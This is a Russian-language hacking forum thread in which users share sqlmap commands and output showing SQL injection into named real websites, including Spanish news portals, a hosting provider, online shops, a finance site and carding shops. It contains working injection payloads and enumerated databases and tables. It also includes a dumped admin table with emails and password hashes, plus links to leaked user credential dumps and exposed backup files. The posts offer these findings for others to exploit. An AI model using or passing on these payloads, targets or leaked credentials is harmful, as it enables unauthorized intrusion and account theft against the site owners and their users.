-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
Diariosur.es Traffic Ranking & Marketing Analytics | Similarweb
diariosur.es is ranked #40 in the News and Media category and #10131 Globally. Get the full diariosur.es Analytics data and market share drilldown here
www.similarweb.com
Код:
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://actualidad.diariosur.es:80/actualidadrc/mundial-baloncesto/noticias/?selecciones=-8261' OR 2268=2268 OR 'SpEp'='isuz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://actualidad.diariosur.es:80/actualidadrc/mundial-baloncesto/noticias/?selecciones=66' AND (SELECT 1753 FROM (SELECT(SLEEP(5)))FdyP) OR 'IwQA'='rpPhweb application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Код:
available databases [4]:
[*] contento_dti
[*] contentoespecialesantiguos_dti
[*] elecciones_2011
[*] information_schemaLaverdad.es Traffic Ranking & Marketing Analytics | Similarweb
laverdad.es is ranked #61 in the News and Media category and #17215 Globally. Get the full laverdad.es Analytics data and market share drilldown here
www.similarweb.com
Код:
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://actualidad.laverdad.es:80/especiales/eurobasket/hemeroteca/index.php?fecha=-7737%' OR 8834=8834 AND 'lFOU%'='lFOU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://actualidad.laverdad.es:80/especiales/eurobasket/hemeroteca/index.php?fecha=2021-02-01%' AND (SELECT 2566 FROM (SELECT(SLEEP(5)))wBgS) AND 'wQVu%'='wQVuweb application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Код:
Database: contentoespecialesantiguos
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| encuesta_votos | 1092463 |
| accesos | 174789 |
| fichero_dimensiones | 65983 |
| contenidos_publicaciones_url | 20869 |
| trivial_participaciones | 17210 |
| ficheros_contenidos | 16074 |
| ficheros | 14832 |
| contenidos_publicaciones_url_20110126 | 13733 |
| noticias | 9217 |
| quinielas_votos | 9192 |
| encuesta_opciones | 7823 |
| votos_ips | 2930 |
| contenidos_zonas | 2629 |
| contenidos_zonas_preview | 2628 |
| encuestas | 2280 |
| fotos | 1537 |
| fichas | 1294 |
| contenidos_publicaciones | 1047 |
| contenidos_publicaciones_plantillas | 1047 |
| modulos | 824 |
| portadas | 567 |
| contenidos_tipos_proyectos | 457 |
| includes | 419 |
| productos | 292 |
| secciones | 214 |
| vocento_noticias | 203 |
| datos_blog | 186 |
| contenidos_publicaciones_automaticas | 173 |
| secciones_tipos_proyectos | 143 |
| publicidad | 131 |
| usuarios_contenidos | 123 |
| usuarios | 59 |
| proyectos_destinos | 57 |
| proyectos | 50 |
| contenidos_tipos | 39 |
| fotogalerias | 30 |
| nube_tags | 16 |
| noticias_categorias | 15 |
| clientes | 14 |
| categorias | 13 |
| trivial | 13 |
| secciones_tipos | 8 |
| contenidos_zonas_automaticas | 7 |
| usuarios_contenidos_favoritos | 7 |
| catalogo_productos | 5 |
| quinielas_participaciones | 5 |
| agenda | 4 |
| marcas | 4 |
| quinielas | 3 |
| contenidos_tipos_grupos | 2 |
| experiencias | 2 |
| pruebas | 2 |
| reportajes_guias | 2 |
| online | 1 |
| servicios_telefonos | 1 |
| terminos | 1 |
+---------------------------------------+---------+Хостер
shneider_basem
information_schema
Database: shneider_basem
[244 tables]
Код:
--risk 3 --level 5 --url https://shneider-host.ru/blog/blogdosubs.php --data=&email=email*&oper=1&username=username --random-agent --timeout=100 --time-sec=100 --hex --dbms=mysql --threads=10 --tamper=between
Код:
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: &email=email' AND 8550=8550-- sOUc&oper=1&username=username
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &email=email' AND (SELECT 4483 FROM (SELECT(SLEEP(100)))HadF)-- UjLj&oper=1&username=username
---information_schema
Database: shneider_basem
[244 tables]
https://era.host какой то довольно таки не плохой хостинг.
Много чего интересного внутри бд.
[*] hosting_billing
[*] information_schema
users - 108k
login,md5unix - https://anonfiles.com/2cd1r7m6uc/users_txt
Много чего интересного внутри бд.
Код:
Код:
--url https://era.host/ru/wordpress-template.php?wptid=1* --random-agent --risk 3 --level 5 --tamper=space2comment
Код:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://era.host:443/ru/wordpress-template.php?wptid=1 AND 8841=8841
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: https://era.host:443/ru/wordpress-template.php?wptid=-6394 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171766a71,0x7a79724a624271726276434f474a786b79764d4a765264456f706c567258775878706f756d696677,0x71717a7a71),NULL,NULL,NULL#
---[*] information_schema
users - 108k
login,md5unix - https://anonfiles.com/2cd1r7m6uc/users_txt
Код:
sqlmap -u https://www.shturm.su/basket.html --data="imageField=1&user_login=1*&user_password=joNkFoJM" --risk 3 --level 5 --dbs
Код:
arameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: imageField=1&user_login=1' RLIKE (SELECT (CASE WHEN (5936=5936) THEN 1 ELSE 0x28 END))-- bCbL&user_password=joNkFoJM
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: imageField=1&user_login=1' AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(4880=4880,1))),0x7178627871),4880)-- oqpW&user_password=joNkFoJM
---
web application technology: PHP, PHP 5.3.29, Nginx
back-end DBMS: MySQL >= 5.6 (Percona fork)
available databases [2]:
[*] information_schema
[*] u0131652_default
Код:
web application technology: PHP, Nginx, PHP 5.3.29
back-end DBMS: MySQL >= 5.6 (Percona fork)
Database: u0131652_default
[25 tables]
+---------------------+
| ak_events_info |
| ak_events_tree |
| ak_subscribing_info |
| ak_subscribing_tree |
| banners |
| banners_group |
| banners_in_group |
| catalog_format |
| catalog_info |
| catalog_tree |
| catalog_types |
| catalog_values |
| cms_tree |
| config |
| document |
| maps |
| methods |
| modules |
| news |
| news_group |
| permission_items |
| permissions |
| shablons |
| user_groups |
| users |
+---------------------+Wai Ji Hong Yip Shop xD
Код:
sqlmap -u https://www.wjhy.com.hk/en/product_index.php?cid=1* --random-agent --risk 3 --level 5 --dbs --drop-set-cookie
Код:
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: https://www.wjhy.com.hk:443/en/product_index.php?cid=-6356) OR 2512=2512-- vhkL
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: https://www.wjhy.com.hk:443/en/product_index.php?cid=1) AND (SELECT 7121 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(SELECT (ELT(7121=7121,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jyFR
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://www.wjhy.com.hk:443/en/product_index.php?cid=1) AND (SELECT 2802 FROM (SELECT(SLEEP(5)))qtYb)-- IXGZ
Type: UNION query
Title: Generic UNION query (NULL) - 53 columns
Payload: https://www.wjhy.com.hk:443/en/product_index.php?cid=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627871,0x5a5378645269704b6d7251436f4362567a51476d69694b5764767073496e4b424445744576625266,0x71706b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux
web application technology: Nginx, Plesk, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
available databases [3]:
[*] information_schema
[*] test_demo
[*] waiji
Код:
web server operating system: Linux
web application technology: Plesk, PHP, Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
Database: waiji
[37 tables]
+---------------------------------+
| member |
| attachment |
| banner |
| city |
| company |
| company_cate |
| country |
| coupon |
| download_cate |
| media |
| news |
| news_cate |
| paydollar_data_feed |
| po_addr |
| po_mst |
| po_st_log |
| po_x_coupon_rltn |
| po_x_prd_inv_rltn |
| po_x_prd_rltn |
| prd |
| prd_brand |
| prd_brand_x_prd_collection_rltn |
| prd_cate |
| prd_collection |
| prd_color |
| prd_inv |
| prd_inv_size |
| prd_material |
| prd_pattern |
| prd_size |
| prd_sub_cate |
| recruitment |
| report |
| sbanner |
| term |
| usr |
| webpage_content |
+---------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Код:
sqlmap -u https://plantersseed.com/categories.php?CID=3* --random-agent --risk 3 --level 5 --dbs --threads 10
Код:
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://plantersseed.com:443/categories.php?CID=3' AND 1145=1145-- tETc
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://plantersseed.com:443/categories.php?CID=3' AND (SELECT 3663 FROM (SELECT(SLEEP(5)))XtBZ)-- jvio
---
web application technology: Nginx, PHP 5.4.45
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] planters
Код:
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.12
Database: planters
[21 tables]
+-------------------------+
| admin_auth |
| admin_auth_permissions |
| admin_group_permissions |
| admin_groups |
| admin_permissions |
| backups |
| categories |
| companions |
| content |
| customers |
| discount_codes |
| email_queue |
| freight_charges |
| header_images |
| order_details |
| orders |
| products |
| products_categories |
| random_images |
| sales_tax |
| skus |
+-------------------------+надеюсь что кому то пригодиться
Последнее редактирование:
Код:
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uUm7M' AND (SELECT 6267 FROM (SELECT(SLEEP(5)))LXXq)-- BkVB
---
back-end DBMS: MySQL >= 5.0.12 (Aurora fork)[*] information_schema
[*] OWPP_An54Ne0g069
sqlmap.py -u "http://portusalud.consumer.es/login.php" --method=POST --data="nicklog=Wiskhdk*&passlog=g00dPa%24%24w0rD&procedede=login"
Код:
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nicklog=Wiskhdk' AND (SELECT 7632 FROM (SELECT(SLEEP(5)))jByt)-- Dvds&passlog=g00dPa$$w0rD&procedede=login
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Precise Pangolin or Raring Ringtail or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP, PHP 5.4.6
back-end DBMS: MySQL >= 5.0.12
available databases [3]:
[*] eroski
[*] information_schema
[*] test
Database: eroski
[5 tables]
+------------+
| Preguntas |
| Rankings |
| Regaccesos |
| Sistema |
| Usuarios |
+------------+
+------------+---------+
| Table | Entries |
+------------+---------+
| Regaccesos | 30873 |
| Usuarios | 9002 |
| Preguntas | 704 |
| Rankings | 12 |
| Sistema | 1 |
+------------+---------+
Не слабо, не слабо)
Код:
--threads 1 --risk 3 --level 5 --random-agent --timeout=100 --time-sec=180 --hex --url "https://myfin.by/banki/bankomaty/gomel?Mapobject[bank_id]=5&Mapobject[filial_type_id][0]=4*&Mapobject[partner]=on"
Код:
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: https://myfin.by:443/banki/bankomaty/gomel?Mapobject[bank_id]=5&Mapobject[filial_type_id][0]=4) OR NOT 7276=7276 AND (3162=3162&Mapobject[partner]=on
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://myfin.by:443/banki/bankomaty/gomel?Mapobject[bank_id]=5&Mapobject[filial_type_id][0]=4) AND SLEEP(180) AND (5993=5993&Mapobject[partner]=on[*] information_schema
[*] new_myfin
Код:
Table: tbl_adminuser
[16 entries]
+-----------------+----------------------------------+
| email | password |
+-----------------+----------------------------------+
| demo1@demo1.com | 7e472de33f732e5e1b209e43a6038cf0 |
| forex@forex.ru | 0e84977c7T6d05c3646ad656e75Wbdf4 |
| news@myfin.by | 2d131eP0fff8f00d8083d975f6df9bec |
| sdasd@asd.ru | 7266l54b882403283d7e44f763a18815 |
| test | bb1cd135c2401464030297411608b8f9 |
| test@test.ru | ad3c8aae2f4d19fcb0506795293a47e6 |
| test@test.ru | 8c2vf055c0322dc64f250a448453b40c |
| test@test.ru | l1647da6078e204928015d0f65980473 |
| te\x83t@test.ru | 5b779f6474ce2bf506c0e03e6df13777 |
| test@test.ru | a2264a23a47814f914da9a9cfbf3802c |
| test@test.ru | f865272da6cdbef67f87fd15efc37c57 |
| test@test.ru | 02d634da91f8fc634a99d27eb0da6892 |
| test@test.ru | 43a510df7c5cf2g7ddf8cb86qb24ff02 |
| tes|@test.ru | 843277ee2df8a478216b715a570bc8d0 |
| test@test.uu | 07594efc672287e9bacc3b6bd3051618 |
| test@test.ru | 65b41be159ff77ef1eeda232b6bd48b3 |
+-----------------+----------------------------------+
Код:
Database: new_myfin
[171 tables]
+------------------------------------+
| tbl_holidays_day? |
| tbl_shops_ma\xc0object |
| tbl_ts_ba\xcek |
| tbl_wiki_te|ms |
| |bl_shops_filter_cat_old |
| copy_tbl_mapobject |
| tbl_adminuser |
| tbl_aliases |
| tbl_api_user_stat |
| tbl_api_users |
| tbl_article |
| tbl_article_category |
| tbl_article_tags |
| tbl_bank |
| tbl_bank_filial_phones |
| tbl_bank_history |
| tbl_best_currency |
| tbl_branding_popup |
| tbl_calculator_amounts |
| tbl_calculator_fields |
| tbl_calculator_forms |
| tbl_card_rassrochka |
| tbl_city |
| tbl_comment |
| tbl_counters |
| tbl_country |
| tbl_credit |
| tbl_credit_cards |
| tbl_credit_type |
| tbl_creditgroup |
| tbl_crypto_company |
| tbl_crypto_contract |
| tbl_crypto_currency |
| tbl_crypto_markets |
| tbl_crypto_markets_currencies |
| tbl_crypto_markets_rates |
| tbl_crypto_mining_params |
| tbl_currency |
| tbl_currency_cbr |
| tbl_currency_nbrb |
| tbl_currency_nbrb_new |
| tbl_currency_new |
| tbl_currency_parsers |
| tbl_currency_rate_2 |
| tbl_currency_rate_multi |
| tbl_custom_page |
| tbl_deposit |
| tbl_deposit_type |
| tbl_depositgroup |
| tbl_email_subscribe |
| tbl_emitent_review |
| tbl_emitents |
| tbl_emitents_obliagcii_subtypes |
| tbl_emitents_obligacii |
| tbl_emitents_obligacii_trades |
| tbl_emitents_obligacii_value |
| tbl_erip_tree |
| tbl_exchange_crypto_history |
| tbl_exchange_crypto_today |
| tbl_exchange_history |
| tbl_exchange_today |
| tbl_experts |
| tbl_featured |
| tbl_featured_blocks |
| tbl_file_storage_item |
| tbl_forex_company |
| tbl_forex_review |
| tbl_ins_product |
| tbl_ins_types |
| tbl_inscompany |
| tbl_insmapobject |
| tbl_insotzyvy |
| tbl_instrument_settings |
| tbl_labels |
| tbl_ls_product |
| tbl_ls_types |
| tbl_lscompany |
| tbl_lsmapobject |
| tbl_lsotzyvy |
| tbl_mapobject |
| tbl_mapobject_work_breaks |
| tbl_mass_request_fields |
| tbl_metally |
| tbl_metro |
| tbl_mfo |
| tbl_mfogroup |
| tbl_mfomapobject |
| tbl_mfootzyvy |
| tbl_migration |
| tbl_model_last_update |
| tbl_model_last_update_yii2 |
| tbl_nbrb_currency_rate |
| tbl_newbuilding |
| tbl_newbuilding_agency |
| tbl_newbuilding_developer |
| tbl_newbuilding_flats |
| tbl_newbuilding_geo_object |
| tbl_newbuilding_photo |
| tbl_newbuilding_short_forms |
| tbl_newbuilding_sorting |
| tbl_newbuilding_towns |
| tbl_newbuilding_towns_district |
| tbl_newbuilding_towns_sub_district |
| tbl_not_lead_request_type |
| tbl_on_demand_tasks |
| tbl_otzyvy |
| tbl_page |
| tbl_page_background |
| tbl_page_cache |
| tbl_page_seo |
| tbl_page_seo_data |
| tbl_page_seo_data_yii_1 |
| tbl_page_seo_texts |
| tbl_page_seo_texts_yii_1 |
| tbl_page_seo_values |
| tbl_page_seo_yii_1 |
| tbl_payment_cards |
| tbl_popup_form |
| tbl_popup_form_fields |
| tbl_popup_settings |
| tbl_press_publications |
| tbl_product_cashback |
| tbl_product_relation_sale |
| tbl_product_type |
| tbl_push_user |
| tbl_push_users |
| tbl_pushes |
| tbl_rbac_auth_assignment |
| tbl_rbac_auth_item |
| tbl_rbac_auth_item_child |
| tbl_rbac_auth_rule |
| tbl_request |
| tbl_request_podbor |
| tbl_request_popups |
| tbl_request_tasks |
| tbl_review |
| tbl_reviews |
| tbl_rko |
| tbl_russian_currency |
| tbl_scoring |
| tbl_scoring_params |
| tbl_settings |
| tbl_shop |
| tbl_shops_categories |
| tbl_shops_city |
| tbl_shops_filter_card |
| tbl_shops_filter_cat |
| tbl_skoring_request |
| tbl_skoring_request_mtb |
| tbl_skoring_request_other |
| tbl_special_project |
| tbl_staticpage |
| tbl_subtype_group |
| tbl_subtype_product |
| tbl_subtypes |
| tbl_system_db_migration |
| tbl_system_log |
| tbl_system_params |
| tbl_system_rbac_migration |
| tbl_system_tasks |
| tbl_tag |
| tbl_towns |
| tbl_transfersystem |
| tbl_user |
| tbl_user_profile |
| tbl_user_status |
| tbl_user_token |
| tbl_user_yii2 |
| tbl_wiki_categories |
| tbl_zaimy |
| tbl_zaimy_type |
+------------------------------------+
Это из-за плагина какого-то скуля?
интересно интересно
https://apiaryfund.uk/apiaryfund.zip прямой линк.даже не качал инвест.мож тема и не та но не пинайте.такого добра сотни линков есть ищуься они на изи
это типа шаблон что ли?
ну вроде бы в comments
есть посты бывают там тоже скуля не помню точно в каких версиях wp
https://myairdropsite.com/backup.sql еще прямой линк,3 мин назад попал там бкрипт так что мое дело только дать)
балуйтесь)
Cloud9
40.76.94.121
Код:
https://cardmafia.ru/inc/login.php" --data="submit=LOGIN%20NOW&captcha=1&login=klehbndy&password=zero0xa"
https://cvv2u.su/inc/login.phpParameter: login (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: submit=LOGIN NOW&captcha=1&login=klehbndy' AND (SELECT 2182 FROM (SELECT(SLEEP(10)))kOID)-- CvDj&password=zero0xa
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] admin_shop
[*] information_schema